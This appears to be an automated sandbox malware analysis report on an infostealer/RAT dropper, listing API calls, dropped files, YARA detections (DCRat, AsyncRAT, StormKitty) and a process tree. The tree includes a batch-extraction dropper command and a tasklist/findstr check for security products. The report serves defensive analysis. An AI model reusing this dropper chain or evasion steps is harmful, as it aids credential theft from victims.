                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003D4763 GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003C1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003CF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Windows\PerfectlyFda
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Windows\AccreditationShed
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Windows\GovernmentsHighly
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Windows\HighKerry
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Windows\PracticalPrevent
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Windows\FilenameWho
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Windows\UpdatedMakeup
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: 0_2_0040497C
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: 0_2_00406ED2
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: 0_2_004074BB
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_00388017
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_0037E144
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_0036E1F0
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_0039A26E
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003822A2
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003622AD
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_0037C624
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_0039E87F
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003EC8A4
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003D2A05
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_00396ADE
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003C8BFF
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_0037CD7A
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_0038CE10
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_00397159
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_00369240
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003F5311
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003696E0
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_00381704
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_00381A76
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_00369B60
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_00387B8B
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_00381D20
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_00387DBA
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_00381FE7
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_01814EF8
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_018157C8
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_01816180
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_01816190
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_01814BB0
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_01816D08
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_06E2A449
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_07060317
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_07069066
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_07068FA1
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_07069407
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_070693B9
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_07069233
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_07069103
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_07069144
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_07069169
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_0706918E
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_070691B1
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_070690A7
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_070690D5
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_07067D38
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_07F0C328
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_07F0E930
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_07F0DCA8
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_07F0F088
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_07F0A430
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Code function: 30_2_07F0B028
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C709F460
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C709E0E0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C709D760
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C71AF3C0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C709FE6F
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C709B2A0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C709EEF0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C7094AF0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C709CAE0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C709F710
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C709C940
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C71AF590
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70A71C0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C71AF1B0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C71B9E10
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70D2840
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70A4870
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C7096890
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70A18AC
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C709B0A0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70A04C0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70A24F0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70CFCF0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70D0110
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C7092509
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C7092509
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70A0F40
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C7091740
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C7094AF0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70C2760
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70CF790
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C719FF5C
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C715B760
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C7091B86
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70D03A0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C7092FC0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C709C3C4
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70D1FF0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70D23E0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C7093810
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C709D640
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70C1240
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70A2A70
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C709BE70
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C7092270
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70EA670
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70A0690
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C709A690
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C709B6B0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70CFED0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70CFAC0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70976F4
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70A3530
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70D0530
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70A1150
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70EA150
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C7092D70
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70E79B0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C711DDC0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C71201C0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C7097DA0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70A01A1
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70D25A0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C709C1BD
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70E75F0
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C70A31F3
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: 36_2_00007FF7C709C610
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Code function: 37_2_000001FD69201D03
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Code function: 37_2_000001FD69202BE7
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Code function: 37_2_000001FD69202133
                  Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                  Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\353090\Seat.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: String function: 004062A3 appears 57 times
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: String function: 00380DA0 appears 46 times
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: String function: 0037FD52 appears 40 times
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Code function: String function: 00007FF7C70A31F3 appears 39 times
                  Source: ADFoyxP.exe | Static PE information: invalid certificate
                  Source: curcuma.exe.30.dr | Static PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
                  Source: curcuma.exe.30.dr | Static PE information: Number of sections : 11 > 10
                  Source: ADFoyxP.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE | Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                  Source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000024.00000002.2543057851.00007FF7C7371000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                  Source: 00000025.00000002.2542566206.000001FD691D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                  Source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                  Source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: ADFoyxP.exe | Static PE information: Section: .reloc ZLIB complexity 1.002197265625
                  Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@122/307@30/23
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003D41FA GetLastError,FormatMessageW
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003C2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003C1A0B AdjustTokenPrivileges,CloseHandle
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003CDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: 0_2_004024FB CoCreateInstance
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003D3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | File created: C:\Users\user\AppData\Local\TradeSecure Innovations
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Mutant created: \Sessions\1\BaseNamedObjects\filemanager1
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\KzwgQiLBsKNC8MJ0zZKWm7EQADmHtlQcAqGCr8Sw14/KL57tXLJJZTjsUP4ab24f22LPEwrDGtXSF6zdOKZ5wg==
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\nsuDD66.tmp
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                  Source: ADFoyxP.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | System information queried: HandleInformation
                  Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | File read: C:\Users\desktop.ini
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: curcuma.exe, 00000024.00000003.2231123152.000002428F038000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: ADFoyxP.exeVirustotal: Detection: 27%
                  Source: ADFoyxP.exeReversingLabs: Detection: 13%
Source: C:\Users\user\Desktop\ADFoyxP.exe File read: C:\Users\user\Desktop\ADFoyxP.exe
Source: unknown Process created: C:\Users\user\Desktop\ADFoyxP.exe "C:\Users\user\Desktop\ADFoyxP.exe"
Source: C:\Users\user\Desktop\ADFoyxP.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
